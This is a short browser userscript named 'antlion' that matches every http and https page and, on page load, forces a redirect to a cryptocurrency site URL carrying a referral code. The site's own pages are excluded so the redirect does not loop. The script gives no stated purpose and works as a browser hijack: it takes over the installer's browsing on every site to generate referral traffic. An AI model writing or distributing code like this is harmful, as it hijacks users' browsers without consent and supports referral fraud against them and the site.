// ==UserScript== // @name antlion // @namespace antlion // @include http://* // @include https://* // @exclude http://coincheckin.com/* // @version 1 // @grant none // ==/UserScript== $(document).ready(function() { var joke = true; var link = "http://coincheckin.com/?r=2ce7e788dd"; location.href = link; });